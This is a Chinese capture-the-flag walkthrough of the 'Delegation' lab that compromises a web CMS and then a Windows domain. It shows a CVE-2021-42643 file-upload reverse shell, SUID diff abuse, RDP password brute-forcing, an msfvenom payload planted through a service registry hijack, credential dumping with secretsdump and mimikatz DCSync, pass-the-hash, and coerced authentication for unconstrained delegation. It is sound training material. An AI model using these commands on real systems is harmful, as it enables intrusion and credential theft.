春秋云境-Delegation
- CVE-2021-42643
- diff提权
- rdp爆破
- 注册表提权
- NTLM强制认证+非约束性委派
flag01
拿到ip后,访问/admin
存在弱口令 admin/123456
登陆后查看版本,该版本存在cve-2021-42643
抓包利用,写一个弹shell的poyload,储存在php文件中;.._d_
表示上级目录,这样可以把php文件上传到根目录。
1 | POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1 |
发包
访问该文件触发命令(访问前先在服务器监听9999端口)
得到shell
由于不是高权限需要提权,查看suid看看有没有可以利用的
1 | find / -perm -u=s -type f 2>/dev/null |
发现一个diff,可以用来提权
查看flag01
1 | diff --line-format=%L /dev/null /home/flag/flag01.txt |
得到flag01和提示
提示WIN19\Adrian和rockyou ,应该是用来rdp爆破的
flag02
上传fscan和chisel
查看机器内网ip
扫描内网
1 | fscan -h 172.22.4.0/24 |
得到内网信息
1 | 172.22.4.7 DC01 |
内网穿透
服务端监听
shell执行命令
搞完代理,扫描shell的ip发现该机器的3389端口开着
使用九头蛇或者crackmapexec爆破
1 | proxychains4 hydra -l win19\Adrian -P /usr/share/wordlists/rockyou.txt 172.22.4.45 rdp |
1 | proxychains crackmapexec smb 172.22.4.45 -u Adrian -p /usr/share/wordlists/rockyou.txt -d WIN19 |
得到账号密码,但是显示密码已过期
win19\Adrian babygirl1
使用smbpasswd远程更改密码,或者直接登录用户后直接修改密码
1 | smbpasswd -r 10.0.0.15 -U 'expired' |
远程桌面登录
1 | proxychains4 rdesktop 172.22.4.45 -r disk:share=/home/kali/Desktop/tmp |
登陆后发现有一个PrivescCheck 文件夹,PrivescCheck 是一个Windows 的提权工具,且是跑完了的,看它生成的 html 文件,发现有一个WSUS和注册表的危险配置
发现用户可以修改名称为gupdate的注册表
注册表提权
先用msf生成一个exe木马
该木马打开SYSTEM的cmd串口,并执行bat的命令,并把它转为exe文件
1 | msfvenom -p windows/x64/exec cmd='C:\windows\system32\cmd.exe /c C:\users\Adrian\Desktop\nihao.bat ' --platform windows -f exe-service > nihao.exe |
nihao.bat的配置如下:
1 | reg save hklm\system C:\Users\Adrian\Desktop\system |
修改注册表命令
通过修改gupdate的注册表项ImagePath 把他改为我们生成的木马
1 | reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\nihao.exe" /f |
启动 gupdate 服务触发 msf 的exe命令
1 | sc start gupdate |
触发成功后,会在桌面生成三个文件
使用secretsdump解密
1 | python secretsdump.py LOCAL -system system -sam sam -security security |
得到管理员和机器的hash
ptt登陆管理员
1 | proxychains4 python3 psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk |
拿到45机器的权限,查看flag
flag03 + flag04
为方便后续操作添加一个本地管理员账户
1 | net user nihao nihao9! /add |
远程桌面连接上
使用探测bloodhound探测域环境,发现WIN19和DC都有非约束委派
非约束委派:允许服务账户以用户的身份访问服务
先下载文件,然后拉入bloodhound即可查看,机器的hash是上面三个文件中解密出来的
1 | proxychains bloodhound-python -u win19$ --hashes "aad3b435b51404eeaad3b435b51404ee:bbd1d50b4689e93dc3b61babef482838" -d xiaorang.lab -dc dc01.xiaorang.lab -c all --dns-tcp -ns 172.22.4.7 --auth-method ntlm --zip |
非约束委派+NTLM强制认证打DC
使用Rubeus监听TGT
1 | Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$ |
如果显示没有net3.5,使用下面命令安装
安装net 3.5
sxs下载
1 | dism.exe /online /enable-feature /featurename:NetFX3 /Source:D:\sxs |
强制认证
使用dfscoerce对域控强制认证
1 | proxychains python3 dfscoerce.py -u "win19$" -hashes :bbd1d50b4689e93dc3b61babef482838 -d xiaorang.lab win19 172.22.4.7 |
或者PetitPotam
1 | proxychains python3 PetitPotam.py -u 'WIN19$' -hashes :2c05ad434d747b203a57565194891b38 -d xiaorang.lab -dc-ip 172.22.4.7 WIN19.xiaorang.lab DC01.xiaorang.lab |
认证后,Rubeus就可以监听到域控的TGT票据
1 | doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6Iki/0YqtJ7VWLHKsnlTAIaKBlKfxBHVuP+4PqtRoAUCDiLg6N9t3Rwd7h/FewEmuAxQV9Dx21LcSkyLnQc2d9WkO/91l93ImQt09Yq9qtWChPbLTWRfSeknqeW0o+M2GaMdOjv2TNFt/OwbvjcwEUddynvqY7cWQ/IQYnQSlGCQDSfIeFMu2Q6aSX1QIheHaK8Tcg6Qs4ythd4i2gtMSDkbeHvJYa/5rPn10P34b/DD/BFJaL3lgLHBA9Jfs4dG0Bi52x66nw8AjeNoFtlwtY7aX0fzC5H5kCTEp+nzXceBXPxd8o8One4txOhE8noytvKslbYXf+npX5p8RMHhH+rFXEg4CDJ+gfm47SpsoppD3p9fbElVU+A5Hbi/62gtxwpDSUdDodo4b3YLdDE16bcrcPjVXxY/caxSoQEml8msFjJ7rVK/0AOkfhkmL1piaMt6S9HvEHAkcw8D0Y5l/j0yqPQ7OwLgKuEqnPYGfiXU9efBHkEybMgZzzaAqSqKmB7jmwvnnLorxcxys3OPNmel19bASrCFTEcixwwpdg/qVkf87FrlWorbMBdTSMkLfGKn95mJnozVz03TccXzvzRyDPTF2UxWc9vW8IpsHM3EqisF/wjcgLC8ShCwRfFy9mRLKkb9p7UALN4NumrVBQFNRFO3l2MYaTShtP/VlHP2rHG+K2WcTx/n9ErcvGAH9ZppjcyfKmPHdhStHlPXiDaH1KD4mNhKz+duGs5yNIaskplKbM7RW3T1M7gzHbvc9GuQjPvyyffYkE3nBAZ4mSozupD1JtFcDBGmPnhcBSI7eu7Hc9Kr2YXdosH5MPtmcUi78VpdLbZTSIeqzVpSeNmpqHxnSqTX44xkh+CPMjrGppDQzx2BXFpgL18W69sS0fMYLu49npyZCuwjEl4IY2RXwhmlZ99RBPru/K1TLSlQnJ31KHdZjICrEmO68qaVv6t5NJi3YwK8jeC4xFhzU10YpJFDcRUnmGXF4ZE0PeUnt3PVSA/AdWZ6+du1DZlYpZ35DwFJnEHEaDwJpiRSSLWPHsoMlo/vodYQyClnJpPjFBbbDcJPsggQaUf+J4hjdxbRY++WT8gdoRuNE/2qpz15Y/4vcbsVOvhXJxtpaim1riXCskG7+VP54e4j/92dMWznaanHlAWlEqs9qPO9CMXbRv0INLlH8G923TftHCx5OMx2xVTMwgloFC8QJnNhY/ZfrRc/Ni4A1H51W8qY6ntSNDS23d3N9zdgKy0q2W7iTrGqTcXpQ0GBdmW/fw+XhWB44AdPTB0gULHkxljL5d3P8IpYZkEYi23eyRLHb06k+KevYfIwJ66hhrjzw2ve6tpKlOzd531Wy5Jarp2+t9CoHeD/6sSHmT5YFsnObLVcq3Bncv7tmtKX/EeCkZfUQ+DPGgUCET/+75mNzIDK0BnlNzzAjA88KsqSHBOvmjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCBJlggmcQ5lpHgQGNePX874w4YU1y+caNbV64KnuuMpSaEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MDIxODA5MjkwMlqmERgPMjAyNTAyMTgxOTI5MDJapxEYDzIwMjUwMjI1MDkyOTAyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg== |
使用命令将TGT转为票据
1 | echo 'doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6Iki/0YqtJ7VWLHKsnlTAIaKBlKfxBHVuP+4PqtRoAUCDiLg6N9t3Rwd7h/FewEmuAxQV9Dx21LcSkyLnQc2d9WkO/91l93ImQt09Yq9qtWChPbLTWRfSeknqeW0o+M2GaMdOjv2TNFt/OwbvjcwEUddynvqY7cWQ/IQYnQSlGCQDSfIeFMu2Q6aSX1QIheHaK8Tcg6Qs4ythd4i2gtMSDkbeHvJYa/5rPn10P34b/DD/BFJaL3lgLHBA9Jfs4dG0Bi52x66nw8AjeNoFtlwtY7aX0fzC5H5kCTEp+nzXceBXPxd8o8One4txOhE8noytvKslbYXf+npX5p8RMHhH+rFXEg4CDJ+gfm47SpsoppD3p9fbElVU+A5Hbi/62gtxwpDSUdDodo4b3YLdDE16bcrcPjVXxY/caxSoQEml8msFjJ7rVK/0AOkfhkmL1piaMt6S9HvEHAkcw8D0Y5l/j0yqPQ7OwLgKuEqnPYGfiXU9efBHkEybMgZzzaAqSqKmB7jmwvnnLorxcxys3OPNmel19bASrCFTEcixwwpdg/qVkf87FrlWorbMBdTSMkLfGKn95mJnozVz03TccXzvzRyDPTF2UxWc9vW8IpsHM3EqisF/wjcgLC8ShCwRfFy9mRLKkb9p7UALN4NumrVBQFNRFO3l2MYaTShtP/VlHP2rHG+K2WcTx/n9ErcvGAH9ZppjcyfKmPHdhStHlPXiDaH1KD4mNhKz+duGs5yNIaskplKbM7RW3T1M7gzHbvc9GuQjPvyyffYkE3nBAZ4mSozupD1JtFcDBGmPnhcBSI7eu7Hc9Kr2YXdosH5MPtmcUi78VpdLbZTSIeqzVpSeNmpqHxnSqTX44xkh+CPMjrGppDQzx2BXFpgL18W69sS0fMYLu49npyZCuwjEl4IY2RXwhmlZ99RBPru/K1TLSlQnJ31KHdZjICrEmO68qaVv6t5NJi3YwK8jeC4xFhzU10YpJFDcRUnmGXF4ZE0PeUnt3PVSA/AdWZ6+du1DZlYpZ35DwFJnEHEaDwJpiRSSLWPHsoMlo/vodYQyClnJpPjFBbbDcJPsggQaUf+J4hjdxbRY++WT8gdoRuNE/2qpz15Y/4vcbsVOvhXJxtpaim1riXCskG7+VP54e4j/92dMWznaanHlAWlEqs9qPO9CMXbRv0INLlH8G923TftHCx5OMx2xVTMwgloFC8QJnNhY/ZfrRc/Ni4A1H51W8qY6ntSNDS23d3N9zdgKy0q2W7iTrGqTcXpQ0GBdmW/fw+XhWB44AdPTB0gULHkxljL5d3P8IpYZkEYi23eyRLHb06k+KevYfIwJ66hhrjzw2ve6tpKlOzd531Wy5Jarp2+t9CoHeD/6sSHmT5YFsnObLVcq3Bncv7tmtKX/EeCkZfUQ+DPGgUCET/+75mNzIDK0BnlNzzAjA88KsqSHBOvmjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCBJlggmcQ5lpHgQGNePX874w4YU1y+caNbV64KnuuMpSaEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MDIxODA5MjkwMlqmERgPMjAyNTAyMTgxOTI5MDJapxEYDzIwMjUwMjI1MDkyOTAyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==' | base64 -d > DC01.kirbi |
使用票据导出域管hash
1 | mimikatz.exe "kerberos::purge" "kerberos::ptt DC01.kirbi" "lsadump::dcsync /domain:xiaorang.lab /user:administrator" "exit" |
1 | mimikatz(commandline) # kerberos::purge |
横向移动
用域管hash登录另一个域用户拿flag03
1 | proxychains4 python3 wmiexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.19 -codec gbk |
查看flag
登陆域控拿到flag04
1 | proxychains python3 psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 Administrator@172.22.4.7 |
1 | proxychains4 python3 wmiexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 Administrator@172.22.4.7 -codec gbk |
参考链接
https://fushuling.com/index.php/2023/09/24/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7delegation/